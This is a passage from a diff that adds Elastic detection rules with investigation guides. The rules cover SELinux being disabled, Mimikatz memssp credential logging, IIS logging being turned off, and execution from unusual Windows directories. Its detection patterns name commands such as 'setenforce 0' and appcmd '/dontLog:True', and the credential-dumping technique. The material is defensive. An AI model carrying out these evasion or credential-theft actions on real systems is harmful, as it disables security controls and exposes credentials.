Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json new file mode 100644 index 00000000000..8b6820cf4c1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json new file mode 100644 index 00000000000..1c51d181bcf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the password log file from the default Mimikatz memssp module.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mimikatz Memssp Log File Detected", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp module, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer account password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json new file mode 100644 index 00000000000..ed9100f21b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the password log file from the default Mimikatz memssp module.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mimikatz Memssp Log File Detected", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached credentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained an initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects such as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp module, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer account password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "references": [ + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json new file mode 100644 index 00000000000..ef186d91952 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "IIS HTTP Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating IIS HTTP Logging Disabled\n\nIIS (Internet Information Services) is a Microsoft web server software used to host websites and web applications on Windows. It provides features for serving dynamic and static content, and can be managed through a graphical interface or command-line tools.\n\nIIS logging is a data source that can be used for security monitoring, forensics, and incident response. It contains mainly information related to requests done to the web server, and can be used to spot malicious activities like webshells. Adversaries can tamper, clear, and delete this data to evade detection, cover their tracks, and slow down incident response.\n\nThis rule monitors commands that disable IIS logging.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Verify whether the logs stored in the `C:\\inetpub\\logs\\logfiles\\w3svc1` directory were deleted after this action.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json new file mode 100644 index 00000000000..7c2e7168880 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "IIS HTTP Logging Disabled", + "note": "## Triage and analysis\n\n### Investigating IIS HTTP Logging Disabled\n\nIIS (Internet Information Services) is a Microsoft web server software used to host websites and web applications on Windows. It provides features for serving dynamic and static content, and can be managed through a graphical interface or command-line tools.\n\nIIS logging is a data source that can be used for security monitoring, forensics, and incident response. It contains mainly information related to requests done to the web server, and can be used to spot malicious activities like webshells. Adversaries can tamper, clear, and delete this data to evade detection, cover their tracks, and slow down incident response.\n\nThis rule monitors commands that disable IIS logging.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Verify whether the logs stored in the `C:\\inetpub\\logs\\logfiles\\w3svc1` directory were deleted after this action.\n- Check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/dontLog*:*True\" and\n not process.parent.name : \"iissetup.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json new file mode 100644 index 00000000000..a7c10e8b189 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_109.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 